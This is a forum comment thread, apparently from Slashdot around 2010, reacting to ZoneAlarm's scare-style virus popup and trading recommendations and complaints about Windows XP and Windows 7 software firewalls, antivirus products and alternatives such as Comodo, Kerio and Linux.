Besides introducing significant change that causes confusion for users, upgrading from XP to 7 costs money*. Money that my friend doesn't have. So you make due with what you have, and make the best of it. I myself can't stand Windows Anything, (This comment posted from a Debian Squeeze box.) but for my friends, they want/need Windows. Since I can't upgrade, I just try to keep their systems running with whatever reputable freeware I can find.

* Committing Copyright Infringment (TM) is an option for me, but can be a support nightmare as you have to keep an eye on what gets upgraded, and when, so WPA doesn't come back to life. (I swear, WGA is a pain to get rid of. Upgrade your service pack, get a new crack. If they don't get viruses themselves, you get them breaking WGA.) Since the only I use ZA is for friends, it's just a better option than trying to upgrade Windows.

Re:ZoneAlarm users get what they deserve

You're right, ZoneAlarm is a peice of shit; setting "check updates manually" results in nags every boot for permission to contact ZoneAlarm servers WITH NO DECLINE OPTION (been like that for a couple years now, they said 'oops it's a bug' implying they'd fix it). So forget it, I'll let it contact automatically, and if it's acting as a spambot I'll hear about it on Slashdot (cross fingers). They're also nice enough to offer this option regarding contact with ZoneAlarm: "hide my IP address when when applicable", which given their previous noted behaviour, this article and their other sleazy tactics and dialogues that can't be cancelled, I take "when applicable" to mean never.
 
With all that said I still have it installed. Because, despite my looking, it's the only gui firewall-only (ie not AV) that offers a balloon popup on all OUTGOING connection attempts with deny, accept and remember options in the balloon.
 
  This basically amounts to Iptables with a gui an pop-ups. I dearly wish I didn't have to have ZoneAlarm installed, but it's the only way I can get that quick popup to dismiss or allow. I hunted around two years ago, and there wasn't anything else similar, and comodo was just bloat. I'd rather have ZoneAlarm installed than have Adobe, winamp, foxit, openoffice etc (just to name the more trustworthy programs) have unknown outgoing connections.
 
It's a PITA to install bloatware firewall/av one after the other. Is there an iptables gui with outgoing notifications for windows (XP)?

Re:ZoneAlarm users get what they deserve

That's partly because the whole user notification and application updating mechanisms are horribly broken from a user perspective. Applications keep exposing their program model to the user with bad error messages, dialogs that are too technical, and, the most offensive one, using nagging, confusing dialogs for updating. The solutions to these problems certainly aren't perfect, and there are arguments for manual intervention for updates, especially in the case of regressions.

Now we are starting to see some progress with Windows Update as well as Chrome, but both solutions are imperfect. Windows Update still exposes too much to the casual user (the auto-update in Windows 7 does work fairly well though), and Chrome's update mechanism, while being quite good for the casual user, is less than ideal for someone who wants to have a more controlled rollout. Apple also has some decent solution ideas and implementations, but Apple also doesn't deal much with enterprise software, OEM crap, and dodgy trials, which is where a lot of these problems come up in the first place.

Once these sorts of behaviours get fixed, users might start becoming a lot more suspicious of random, technical-sounding requests and just might think: "Gee, these dialogs aren't normal, might want to click No or Cancel."
Developers have been making progress in the last 2-3 years though, maybe in ten or so years, we'll have good, standardised solutions incorporated into development frameworks and guidelines.

Re:ZoneAlarm users get what they deserve

[cerberusss]

Try upgrading to Windows 7 and using Windows Advanced Firewall instead of a 12-year-old product ? :)

I haven't used Windows on a day-to-day base since 6-7 years, so I was pretty surprised to learn that as of two years ago, Windows XP was sold pre-installed on systems like the ASUS Eee Box. These are little Intel Atom-driven machines as small as a lunch box. Due to their limited CPU power, they came with Windows XP.

You generally do not update such small boxes to a big OS like Windows 7, it will probably run dog-slow while the preinstall is working pretty smoothly. So I agree with your general sentiment, but upgrading is not for everyone.

Re:ZoneAlarm users get what they deserve

[Spad]

http://blogs.technet.com/b/jamesone/archive/2009/02/18/how-to-manage-the-windows-firewall-settings-with-powershell.aspx

Yes, it's just interfacing with the com object, which is a little cumbersome, but given the rate at which MS are adding service-specific Powershell modules, it wouldn't surprise me if there are some proper PS tools for working with the Windows firewall in the near future.

Re:ZoneAlarm users get what they deserve

[TheThiefMaster]

Windows applications will trigger a "do you want to allow this program through the firewall" prompt, easing setup. I haven't seen that on Linux.

You also get independent firewall rules for being connected to different classes of network: domain, work, home, and public. This is invaluable for laptops (which will basically turtle on a public wifi). Again, I don't remember seeing this feature in any Linux distro either.

Re:ZoneAlarm users get what they deserve

[TheThiefMaster]

Would you prefer a blacklist?

Re:ZoneAlarm users get what they deserve

[cyclomedia]

Indeed but surely I'm not the only slashdotter who has the firewall turned off and no av/scanning software installed at all?

The trick is to not use any MS software except for windows (XP) itself (currently on Chrome, Thunderbird, OpenOffice) but keep Automatic Updates turned on (though that requires a Legit copy of XP...) and not to have friends who are likely to email you screensavers. Not had any problems in years (last incident was an unpatched 2000 box that was pwned within minutes of going online). Cue "That's what they want you to think" replies in 5...4..

Re:ZoneAlarm users get what they deserve

[mysidia]

Windows applications will trigger a "do you want to allow this program through the firewall" prompt, easing setup. I haven't seen that on Linux.

The functionality exists..

TuxGuardian

Linux-firewall.org

Re:ZoneAlarm users get what they deserve

[mysidia]

It should probably be noted one does not dare install bloatware such as ZoneAlarm on such a box, either.. low-powered hardware is a special case <G>

Re:ZoneAlarm users get what they deserve

Ok, so the only wrong part of my post was that iptables was 11 years instead of 12 (and that wasn't even my post). Thanks for agreeing.

ZA -- good but time passed it by

[mlts]

I remember ZA being decent, especially the registered version. However, there isn't a need for it anymore, just like there isn't a need for QEMM-like packages for new equipment. Windows 7 has a decent built in firewall to keep things out [1], and for antivirus protection, Microsoft Security Essentials is a download away and licensed at no charge.

[1]: If a compromised app is trying to phone home, the battle is lost when it comes to host security. So having a firewall popping up Allow/Deny dialogs is pointless on post-XP Windows versions because of the amount of false positives generated.

Re:ZA -- good but time passed it by

Agreed. If you're on Vista/7, Windows Firewall + MSE is plenty good. If you're not, and you're a home user, time to either upgrade or install Linux if your machine is too crappy and you can't be bothered to get new hardware. Corporate users have mandated security software anyways, so no decision to make there.

Re:ZA -- good but time passed it by

[Altrag]

Which is why most firewall software has a "always do this" option of some sort. The first week or so after you install a new firewall program generally sucks, but after that you've usually got most of your "real" apps marked off and things go pretty smoothly from there on.

Of course for some people, a week worth of always clicking "Allow" is enough to train them badly forever.. but there's only so much that can be done :P.

Re:ZA -- good but time passed it by

[mlts]

If a user is using XP, even XP's outgoing firewall is decent. These days, the only real niche for ZA is Windows 2000 and earlier, operating systems with no intrusion protection from incoming network attacks.

Other than the edge/corner cases of embedded equipment running Windows 95/98/ME/NT/2000, people who still have HP Journadas or other portable items that run a way backlevel version of the OS, and maybe someone running old applications on a VM with this old an OS, I just don't see any point for ZA as a standalone product anymore.

If I were running Checkpoint, I'd sell the software product for an inflated price for backlevel systems (Windows 2000 and earlier), put the software on maintenance mode, and call it a night.

Re:ZA -- good but time passed it by

Years ago when ZoneAlarm was owned by ZoneLabs I thought it was a pretty decent product. I stopped recommending it though after it became too bloated and reading this latest Check Point stunt certainly doesn't restore my faith in it. I still have have some slight doubts about the integral WinXP firewall since it's still a one-way utility. Win7's firewall seems to be pretty robust however. Still, for pre-Win7 systems I've been recommending Outpost, functionally it reminds me of what ZoneAlarm used to be, and visually the GUI is just cleaner and simpler. Doesn't suck up a lot of system resources either.

Re:ZA -- good but time passed it by

[Ecuador]

just like there isn't a need for QEMM-like packages for new equipment.

What do you mean? Is there another way for new equipment to make 610kb+ of base RAM available to play Sensible Soccer?

Re:ZA -- good but time passed it by

[Gaygirlie]

If a compromised app is trying to phone home, the battle is lost when it comes to host security.

Not really. If the firewall warns you of an app trying to phone home and you either don't know the app and it looks suspect, or if it's an app that shouldn't be using internet then you can be quite sure your system has been compromised. And then you can unplug it and try to fix it. However, if you don't get such a warning you won't know anything. Atleast the warning gives you a chance to try and fix things.

Re:ZA -- good but time passed it by

[alexo]

If a user is using XP, even XP's outgoing firewall is decent.

XP has an outgoing firewall? I thought it was only incoming.

(Disclaimer: I haven't used the XP firewall for a very long time)

Anyone know a decent software "firewall"?

I used to use Kerio in the WinXP days, but it doesn't cooperate with Win7 x64.

Requirements:
1) Rule-based. I want to permit/deny network traffic to certain apps. 2) Option of "PermitTraffic/AllowTraffic" and "LogTraffic/IgnoreTraffic" as independent settings. (e.g., I want to allow logging of permitted applications' traffic, as well as denied apps' failed attempts, and after looking at the logs, decide whether or not I want to bother logging it.)
3) Accurately figure out which app is actually responsible for denied traffic. (Looking at you, PrivateFirewall 7.0, which never actually says that it's the Windows Update client that's legitimately trying to access some random Akamaized download site.)

I tried the built-in Windows firewall, but it was difficult/cumbersome to set up in default-deny mode, and when I did, I couldn't easily find out which app was causing the denied traffic. (e.g. is it some game that phones home on the first attempt to register/activate, or is it some bullshit Games For Windows Live client that has no need to be used in a single-player game?)

Thanks to PrefBar for one-click Javashit and Flash toggling, a non-Adobe PDF reader, an ad-blocking local proxy, and the equivalent of a decent-sized ad-blocking HOSTS file implemented in the external router, I've never actually been hit with malware, so I'm more interested in monitoring unsolicited outbound traffic than worrying about inbound traffic. Likewise, I'm more interested in legitimate apps rather than malware that could trivially disable the software "firewall". Given that sort of environment, what's the current best practice for software "firewalls"?

Re:Anyone know a decent software "firewall"?

[mlts]

That is exactly how to do security these days. Running a capable browser with Adblock, Foxit for PDF reading, keep add-ons like Quicktime and Flash updated if one uses them. Just Adblock alone gets rid of the dodgy ad sites, some of which allow third party advertisers to try to use bugs in add-ons as a vector for compromise.

Hardware firewall first to protect machines from incoming network attacks. Second are filtering the ad sites which will happily slap drive-by malware on people's machines. Third, filtering out JS and other add-ons unless the user wants to see them.

Finally, fourth is a program like Microsoft Security Essentials that is licensed at no charge and does not nag. This all assumes the user is clued enough to not be affected by the Dancing Bunnies security hole too.

Re:Anyone know a decent software "firewall"?

[Martin+Blank]

Kerio's firewall was picked up by Sunbelt, which has been promising a 64-bit version for some time but has yet to deliver.

Actually, looking at their forums, they just posted a couple of days ago that the new 64-bit version of VIPRE (their AV software) includes a firewall. VIPRE is pretty good and has low resource utilization. I've got Nod32 at home, and it was a toss-up on which to go with, but Nod32 had a slightly higher percentage of malware caught in a test at the time, so I went with that. (Nod32 has a 64-bit version, despite the name, and it also includes a firewall.)

Re:Anyone know a decent software "firewall"?

Try Comodo personal firewall. I used Kerio back in the day and loved it. Comodo is pretty much identical in all features.

Re:Anyone know a decent software "firewall"?

If it were possible this post would get a +100 Insightful mod from me.

Being able to stop crapware phoning home (e.g. viruses, trojans, Adobe updater, Google updater, Apple f**** updater and all such SHITE) is a must have feature for a modern computer.

Re:Anyone know a decent software "firewall"?

[WuphonsReach]

licensed at no charge

Only if your machine is strictly used for personal use.

Can't use it in a small business or corporation or any other situation where you make money (not sure where non-profits fall on the licensing).

Re:Anyone know a decent software "firewall"?

It can be used for a SOHO company as per the EULA. Anything bigger, you want antivirus that is more enterprise-level that can report that all clients are protected for CYA reasons, such as Symantec Endpoint Protection [1], or Forefront [2].

Enterprise stuff isn't perfect, but generally software for businesses is designed to work, as opposed to squeeze the consumer for every last dollar.

[1]: SEP is how Norton Antivirus should be. Yes it is fairly big, but it works and won't ask you to renew annually, although having support is how this is made up.

[2]: Forefront is also decent and seems to be one of the lighter AV programs with regards to RAM and CPU usage. As per Microsoft's ads a few years back (IIRC), it also was instrumental in preventing zombie invasions. So, having AV software that can stall off the zombie apocalypse is a strong selling point for this product.

Re:Anyone know a decent software "firewall"?

[alexo]

Try Comodo personal firewall. I used Kerio back in the day and loved it. Comodo is pretty much identical in all features.

Another user of Comodo here. Be aware that Comodo firewall also contains a module that analyzes apps for suspicious behaviour. I turned it off since I felt that MSE covers that angle but YMMV.

YO! BOZO! It's called MARKETING !! Internet Style

Welcome to the internet syndeq !!

May I please have your SSN, DOB, and mother's maiden name, and bank account number?

Upon reciept of this I will forthwith depoist the sum of

  $1,000,000.00

into your account.

Thanks,
Chief Abu Grabe Graves, III

Re:YO! BOZO! It's called MARKETING !! Internet Sty

You had me up until "forthwith." Forsooth! Now I know it's a scam!

Zounds! ZoneAlarm zealous about Zeus.Zbot?

[Culture20]

Whatever happened to alliteration in article titles?

Re:Zounds! ZoneAlarm zealous about Zeus.Zbot?

[cormander]

Zo zany zeez in Z zrticle zust zooks zad.

I stopped using that crap...

[TavisJohn]

When they basically refused to support Windows 7. I have sense replace the firewall on ALL my machines (including my XP machines) with PC Tools Firewall Plus. It is free, and provides better protection than Zone Alarm.

Re:I stopped using that crap...

[Ecuador]

What's wrong with simply using the Windows 7 firewall? Maybe ZoneAlarm did not support Win 7 because they know there is already a better firewall included...

Re:I stopped using that crap...

[TavisJohn]

The built in firewall allows apps to give themselves permission to access the internet. So that means that spyware and other crap that a firewall is supposed to block... Can give itself permission to go online.

Plus PC Tools firewall will also ask me if I want to allow one app to use another. That prevents viruses from spreading and infecting my computer. The Windows firewall does not do that.

I find the Windows firewall hard to use and change settings for. PC Tools is really easy for me to alter the settings for.

I like having total controll over what apps can and can not go online. I mean why does windows defrag need to connect to the internet? [block]

Re:I stopped using that crap...

[TheThiefMaster]

The built in firewall allows apps to give themselves permission to access the internet. So that means that spyware and other crap that a firewall is supposed to block... Can give itself permission to go online.

Only if the app is allowed to run as admin. And if it's running as admin, you're hosed anyway.

Re:I stopped using that crap...

[TavisJohn]

I just do not trust the Windows Firewall. It does not monitor the interaction between apps either. So if one app wants to use another PC Tools will prompt me, Windows firewall will not.

Re:I stopped using that crap...

[TheThiefMaster]

Use another? You mean starting it as a process?

Because that doesn't sound like a job for a firewall...

Re:I stopped using that crap...

[QuantumBeep]

If you really intend to act as a human traffic controller for all software on your PC, and seek software to enable you to do that, your time is not worth very much.

Re:I stopped using that crap...

[TavisJohn]

It does not take THAT much time. I get a prompt I choose yes or no, and remember. So I only have to make the decision once for each app. Once it is in place, I do not have to worry about it.

Kind of like teaching your e-mail's spam filter what is and is not spam to you. It takes time at first then later you do not have to worry about it.

If it was not for this firewall then Windows Defrag would have connected to the internet and I would not have known. Who knows what data it was transmitting to Microsoft? Some apps have no need to connect to the internet, yet they will do it anyway. WHY?

Re:I stopped using that crap...

[QuantumBeep]

I've no argument with the firewall. It's the "program interaction" feature you mentioned that made me wonder.

Some apps have no need to connect to the internet, yet they will do it anyway. WHY?

Because the world has changed. Software accesses the internet if there's any slightly convenient or useful thing it can do thereby ("useful" in this case is often something only the developer could comprehend to begin with). It's not a crime. It's easy, readily available, and very 2010.

You are, of course, welcome to monitor your computer and only allow approved software to access the internet, but I submit to you that the developers are not wrong for using the internet.

Re:I stopped using that crap...

[TavisJohn]

Are they wrong, no. However apps like MS's defrag app have no reason to connect to the internet. What could it possibly need the internet for? And it does not stop working when I prevent it from connecting to the internet.

Most of the other apps I have either check for updates automatically, but they give me an option to turn that off, or are designed to connect to the internet and they tell you that this app will be doing it.

The program interaction protection is actually a useful feature. It prevents one app from modifying another app without your permission. That feature has prevented my cousin from having a virus spread and embed itself in her OS. Instead of having to do a major cleanup, or format and re-install It was an easy matter to remove it.

However every so often you come across an app that does not need to connect to the internet, has no mention of any internet based features, and no option to disable such a feature. That is the issue I have.

Notice This:

Note how some posts have "SNIP" in them.

Obviously, they are editing people's posts to keep them from suggesting better firewalls.

Hell, I may dump Zonealarm myself and try Comodo. I heard that firewall is less taxing on resources...

"customers"

[Necron69]

I don't think that word means what TFA's author thinks it means.

- Necron69

ZoneAlarm?

I left that behind when Microsoft came out with a product. What are they going to do, screw me even more?

Like they could! I swear Bill Gates could come to my house and hit my balls with a hammer for all the harm it would do.

I tried Comodo for a while, it was nice, but it had problems with multiple users.

Re:ZoneAlarm?

[couchslug]

"I swear Bill Gates could come to my house and hit my balls with a hammer for all the harm it would do."

I, for one, find that idea vaguely arousing.

Alternatives

[Barefoot+Monkey]

I'd love to hear some opinions on this matter. I'm completely unsatisfied with Windows XP's firewall, but if I don't want to use ZoneAlarm then what other good options are out there? And regarding Windows 7: is its firewall decent enough that there's no need to replace it?

Re:Alternatives

[NetNed]

I'd say with Vista and 7 the firewall is good enough that you don't have to use a third party software. The XP firewall is very basic and only monitored (controlled) incoming traffic. So If you got something nasty on your system it would do nothing to stop it from phoning home. 7 and Vista can monitor outbound traffic also so that alone make them much better solutions. 7's firewall goes even farther then vista's giving the user ability to configure multiple policies for different environments, nice for a notebook that connects to multiple networks.

I have tried a couple of different software versions for XP boxes, because contrary to what others say XP's firewall is not really very safe regardless of what service pack you have installed. I have tried Comodo's and ashampoo's (in addition to ZA) offerings. Comodo had a feature that it was supposed to "learn" your surf habits and adjust accordingly to be less intrusive over time. Never happened no matter what I did and Comodo just kept asking and asking for permissions for every little thing, even multiple instances for the same program. I'm sure it is very secure, but I think it is going a little overboard on it to a level that I feel I do not really need. Ashampoo I just did not like at all. The interface seems clunky and its gap from easy mode to expert mode was vast, too vast and need a in between setting to make it feel safe but not locked down. I went back to ZA on my XP boxes after using the other 2 long enough for a couple versions of ZA to pass. The reason I went away from ZA was the bloat, but with (ver 9.2) the newer version the bloat didn't seem to be the issue it was before. I didn't care for the "you might have this virus" pop-up, but I can read and see it was a ploy to get me to buy the full version. Sneaky and under-handed as it might be, I'll stick with it for now till I get another chance to try some others.

Why do you put up with all of this?

[node_chomsky]

Looking at the posts in this thread makes me very glad I don't have to do any of this to keep my computer functional. Windows is a complete joke, I don't think anyone has to put up with more bullshit in computing than the average Windows user, I do genuinely feel bad that these people waste so much time and money on such poorly built technology. It's really very tragic.

Re:Why do you put up with all of this?

[pslytely+psycho]

My guess is your a Linux user, and that's all well and good. But if you are a gamer, Linux doesn't work so well. Windows isn't all that bad. I tried Linux years ago and found I didn't care for all the setup it required. I am sure it has improved with what I've read about recent distros, but it still won't play the games I use or run my mapping/gps program.

And MS has really stepped up to the plate with Microsoft Security Essentials.

If Linux ever gets as large of a customer base, you too, will be needing AV.

Amazing as I have never seen so many non-negative MS comments on an article as I have with this one. All the Windows users came out of the closet for this one.

Re:Why do you put up with all of this?

[node_chomsky]

If Linux ever gets as large of a customer base, you too, will be needing AV.

I have heard this argument before, and I don't entirely agree with it. I think there would be plenty of security holes and viruses if another OS became as dominant as windows, but I think that the way Windows is set up at the deepest levels, it allows non-users far more access to the internal workings than any of it's competitors.

I don't think viruses or security problems would disappear if everyone switched to a Posix-style OS, but I certainly think a far smaller percentage (as in orders of magnitude) of computers in the world would be loaded down with viruses, worms, bots, etc.. And the biggest problem with windows is just how poorly legitimate software runs to begin with, and how easily and often it will install ancillary garbage you never asked it to install ("Bonzai Buddy" comes to mind).

It's easy to blame the user for these things, but why should the user have to think about security to begin with, the flexibility of computers and the process that produces their designs dictates that reasonable level of security can be made simple and easy for the user to keep up with without the addition of inadequate third-party solutions to the problem.

Microsoft is really bad about drowning the user with obtuse warning messages that cause them to generally ignore the important ones. From a behaviorism-oriented perspective on how they set everything up (I'm a behaviorists, so this is just how I look at things), it's a miracle that it works at all. And if the Windows boxes in my office are any indicator, most people just get by with partially functional computers for the most part.

This is just the tip of my very large rhetorical iceberg on this matter, but I appreciate the intelligent response to my less than intelligent comment, hehe.

Re:Why do you put up with all of this?

[node_chomsky]

My guess is your a Linux user

Actually, I have a Macbook Air that I run OS X, XP (this is only for access to SPSS via an Active Directory system I need for work), and BackTrack 4. I use each one for various purposes.

Re:Why do you put up with all of this?

[pslytely+psycho]

I learned Applesoft on an old Apple II clone what seems like a couple of centuries ago! Apple always had a good product that was always cutting edge.

Back when all computers were expensive they were the best. But now they have priced me right out of having one. Most of my favorite games aren't compatible either, nor my gps program.

Too bad too I really like their products. Just can't afford them!

Re:Why do you put up with all of this?

[node_chomsky]

It is unfortunate that they are to some extent more expensive, but I think that it's a result of not cutting corners rather than any type of marketing inflation (the iPod is a very different story however). They just build computers the way I would build them. I work with children with Autism, and you would be amazed at what kind of havoc the sounds of computers wreak on the average sensory-oriented classroom (they are special-ed classrooms with certain sound and tactile features modified for Autism Spectrum Disorders). A low-quality computer fan can really be the difference between a good and bad day. I like my MB-Air because it never makes noise (unless you cover the vent holes and get it hot enough to kick the fan on).

Re:Why do you put up with all of this?

[pslytely+psycho]

I applaud your work with autistic children. I have two autistic granddaughters. So I very much understand what you mean.

Both of them love computers (and bowling!)but the youngest one is OCD as well and literally melts when something is out of place or doesn't go her way. The older one couldn't care less if things are in order but can be very demanding and picky. They are 3 and 5.

Please continue your good works. I applaud what you do and wish there were more like you.

Good day, and good life sir!

Re:Why do you put up with all of this?

[node_chomsky]

Thankyou! It sounds like your grandchildren have a Grandad/Grandma who definitely loves them, which all kids really need when you get down to it. I see some very tragic situations on a daily basis, and the one thing they have in common is not enough love, or love in the wrong form, it sounds like your babies* have everything they need.

*All the older ladies I work with call their students this, I have started using it the same way, hehe.

P.S. it was nice having such a civilized conversation on this website, it reminds me of the multi-week discussions that use to take place on BBS's back in the day, not to say there wasn't a fair amount of trolling back then as well.

Re:Why do you put up with all of this?

[pslytely+psycho]

Yes it was indeed nice to have such a conversation! My Grandchildren are indeed much loved and have great parents as well who are doing everything to ensure they grow up as well adjusted as possible.

The ladies at the school the girls attend call them their babies as well. It is a special school for autistic children that is very highly rated in my area.

Again keep up your most worthy work!

Quit using it

[p51d007]

Years ago. The built in version for XP, Vista & 7 for most people are sufficient.

List of free Windows firewalls

[Aryeh+Goretsky]

Hello,

Below is a list of free application software firewalls I put together a while ago. Not sure if they are all current, and I am probably missing quite a few, but it is a starting point.

Firewalls
Active Network - Active Wall Free Edition
Agnitum - Outpost Firewall Free
AS3 Soft4U - AS3 Personal Firewall
Ashampoo - Ashampoo Firewall Free
Comodo Group - Comodo Firewall (now a part of Comodo Internet Security)
FilSecLab - Filseclab Personal Firewall Professional Edition
Group 4 Business Intelligence - IDNWebShield (main web site down when last checked)
NetVeda - NetVeda SafetyNet
PC Tools - PC Tools Firewall Plus Free Edition
PrivacyWare - Privatefirewall
SecurePoint - Securepoint Personal Firewall & VPN Client - (discontinued?)
SoftPerfect - SoftPerfect Personal Firewall
Tall Emu - Online Armor Free - (acquired by EmsiSoft?)
WIPFW Project - WIPFW - (port of BSD IPFW)

Firewall Managers
GT Delphi Components - Windows Firewall Ports & Applications Manager (WFWPAM)
Sheesley, Eric - XPFiremon

Hopefully, this is of help.

Regards,

Aryeh Goretsky

Re:List of free Windows firewalls

> Not sure if they are all current, and I am probably missing quite a few, but it is a starting point.

Yeah. You are missing Firewall 2010, and Firewall 2010 Professional. Also for older computers Firewall 2009 might be good choice. Assuming you have Antivirus 2010 installed.

Re:List of free Windows firewalls

[orange47]

I'd add Look'n'Stop firewall. it seems to be very good, because its lightweight and has 64bit version. thankfully it does not work as antivirus and all that.

you mentioned WIPFW. thats probably the best/fastest of them all. but its not easy to install 64bit version of it, and takes a lot of knowledge to configure. also, iirc, that kind of firewalls don't support blocking by application, only by protocol.

Re:List of free Windows firewalls

[Aryeh+Goretsky]

Hello,

I have heard that Look 'n' Stop is a good firewall, however, it is not as far as I am aware, free for home or personal use, which was what I wanted to provide via the list.

Regards,

Aryeh Goretsky

Re:List of free Windows firewalls

[orange47]

yes, sorry. I remembered that after clicking submit..
another one to consider is Jetico Personal Firewall, but I'm not sure if its free either.
anyway, if someone paid for windows, it seems reasonable to pay little more for such an important piece of software like firewall.

Re:List of free Windows firewalls

[QuantumBeep]

if someone paid for windows, it seems reasonable to pay little more for such an important piece of software like firewall.

No. $100-$300 for a consumer operating system should be enough, god-damn-it. No more money should have to be spent just to operate the fucking thing.

Caveat !Emptor

[Capt.Albatross]

It took me a while to decide where I stand on this. Generally speaking, users of a free product who complain about what they get have an over-active sense of entitlement. I would make an exception in the case of blatant deceit, but I don't think that this quite qualifies as such -- a reasonably careful reading of what they say shows what little they actually claim to offer. What they deserve some grief for, IMHO, is poisoning the well for more selfless and principled purveyors of freeware, whose interests are presumably harmed if people are turned away from trying their products on account of actions like these, and also for spreading confusion over so important an issue as security.

This reminds me..

of the old botnet visualizations. I checked what the ips hosted and there was a fancy circlejerk going on with 'anti identify theft' -services refering to eachother, in services, prize-comparisons and ips. very same people craft assaults and protections (or repairing) for profit.

not much different from "security scan"

[roc97007]

"We have met the enemy, and he is us."

I stopped using zone alarm a long time ago.

But besides all that, I've noticed that just about everything you download these days also tries to install (besides Yahoo Toolbar) a free copy of -some-name-brand- Security Scan, which appears to be nothing more than an advertisement for the company's non-free antivirus package. It really seems like the antivirus people are more and more adopting the same business model as the scareware vendors from which they purport to protect us.

phonies

ZoneAlarm Popup Message Explained

The popup message in ZoneAlarm Free Firewall was intended as an alert to a virus our technology discovered. We wanted to proactively let our users know that ZoneAlarm Free Firewall and other AV products do not fully protect from this virus. It was never our intent to lead customers to believe they have a virus on their computer. This was purely an informative message about a legitimate and serious virus that also included information about the differences in protection of various products, and how to get protection against it. ZoneAlarm is committed to providing our customers with the best protection and considers it our job to proactively alert users whenever a potential risk is looming rather than wait for the damage to be done.

Avoid

The free Comodo firewall is rated to be far superior than ZoneAlarm. Change to Comodo, no ads or hype.

Any replacement for Kerio 2.0?

I hated ZoneAlarm back in the day. It was back then that I got turned to Kerio/Tiny Personal Firewall 2.0. Unfortunately I had to get rid of it because the firewall driver of the 2.x versions prevented Windows from hibernating/suspending. Is there a good replacement for this old stalwart?

PC-based firewall software is all garbage

[jonwil]

If you are on a small network, get a router with a built-in firewall (even a home all-in-one broadband router is good enough for this)
If you are on a larger network, get a proper firewall (e.g CISCO PIX)

And in all cases, run a GOOD anti-virus (that means something OTHER than Norton or McAfee) and keep all your software patched.

If you DO feel the need to run a firewall e.g. if you are connecting over wireless broadband (where you cant put a hardware firewall between you and the network) or if you are on coffee shop or McDonalds WiFi, the windows firewall is good enough for the purpose and doesnt have any of the problems that 3rd party programs like ZoneAlarm or Norton Internet Security has.

Last time I tried a software firewall (Norton Internet Security), it worked GREAT. It did a great job of preventing my internet from working :)

Re:PC-based firewall software is all garbage

[cgili]

Obviously you only are talking about Windows OSs Linux Distros have a lot of very good options for firewalling and routing... By the way the CISCO routers and firewalls use a *nix or even Linux based OS. If you are a BIG ISP and you need to make variable rules for rerouting your trafic or block atacks is to use a Linux Box that can automatically block an IP after several failed attepts to log in to your FTP, SMTP, POP, or other specific ports/services...

Re:PC-based firewall software is all garbage

[jonwil]

Yeah, linux has some good options. But even with Linux, its better to run a standalone firewall solution as a separate locked-down box if you can. (less attack surface if its just a firewall and nothing else)

Re:PC-based firewall software is all garbage

[pnutjam]

You mis-pelled pfsense.

Seriously, pix is obsolete garbage, the new one is ASA, but why buy that when you can put your money toward supporting pfsense, or use it for free.

Re:PC-based firewall software is all garbage

[jonwil]

Not having used anything beyond what comes with my all-in-one router, I wasnt aware of all the firewall options out there.

My specific point was that a dedicated firewall appliance (which might be *nix running on a dedicated PC) or a router with built-in firewall was better than a windows based program and that if you have such a dedicated firewall or router-based firewall, you dont need to run ZoneAlarm, Windows Firewall or any other PC firewall.

Kaspersky also guilty

My neighbor had Kaspersky Anitvirus installed. They somehow got his e-mail address, probably upon installation. Starting two months before his license expired he started to get emails "threatening" him that he would be under attack after this period and that he should buy the new version. Of course these mails may not seem that dramatic to most /. users, but my neighbor is an retired teacher who is very concerned about his pc security.

Two answers

[cheros]

If you absolutely have to continue suffering the worst computing experience possible, get at least Kaspersky. It works, not too much overhead and doesn't use incomprehensible blinky tray icons that won't tell you anything useful (yes, Norton, that is you).

Otherwise, enough already. I'm very weary of anything that has a complete cult as supporters, but as I also use Linux I figured I ought to try a Mac as well. I'm still not a fanboy, but I can recommend it, if only to experience what computing ought to be like. You really do not realise just how many interruptions per day you get as Windows user because something or another wants to update - only when you have been working on a Mac becomes that clear.

I guess this is also why anti-virus companies are anxious to avoid offering you a listing which tells you how many virus infections and trojans exist for each platform - you would switch, and they would lose their market..

Recent updgraded is broke

[Aceticon]

I recently gave in to the nagging "Update" prompts and had my Zone Alarm update itself.

After that my machine (XP) started totally freezing periodically, requiring a restart. Being a device driver and having been updated recently, Zone Alarm was the natural suspect.

So I looked around for a new free firewall and found Comodo Internet Firewall. I replaced Zone Alarm with it and, lo-and-behold, no more freezes.

The Comodo firewall can be quite bit more nagging than ZA, and unless you have it set in the lower paranoia mode it will prompt for stuff which is real obscure for non-technical users but at the end of the day it still works better and is more powerfull and configurable (for example, ZA free has nothing to show which applications have which connections open, but Comodo does).

5 years ago, Zone Alarm free was great and most other personal firewalls were either enormous turds (McAfee, Norton) or obscure and hard to configure. Nowadays there are plenty of good personal firewalls out there and Zone Alarm has been going downhill.

ZoneAlarm is not the only one doing it....

[cgili]

ZoneAlarm is not the only one doing it, Panda Antivirus is doing the same. Panda freezes the PC and even the Control Panel whenever a user tryes to remove it so the software don't complaints every 5 minutes stoping their work.... Get smart, change to *nix or Linux distros and you'll never need an antivirus or firewall to protect your PC from viruses that are created by the same companies that try to sell you an antivirus for your security. Of course not all the viruses are created by this Companies.

if you didn't pay, you're not a customer.

[steak]

"Check Point's customers have inundated the ZoneAlarm forums with complaints."

How can you complain about something you got for free. Don't look a gift horse in the mouth and all that.

If you don't like it, don't use it.

Why the Marketing Team

[Jason+Levine]

From one of the comments by the ZA forum moderator: "ZoneAlarm Marketing team has turn off this pop-up alert in ZoneAlarm Free firewall."

The Marketing team has turned off the pop-up alert? Why would the marketing team have control of pop-ups appearing on my system? Sorry, ZoneAlarm, but turning off the pop-up isn't going to fix all of this. I now know that having ZA on my system means that some marketing guy somewhere can make messages appear on my system just to sell a few more pieces of software. I'll be uninstalling ZoneAlarm the first chance I get and will install one of your competitors instead.

I disagree

[nurb432]

windows firewall only blocks incoming. In today's world you need to lock down outgoing as well.

But ya, ZA sux. Where are the OSS firewalls? It cant be that hard to write one?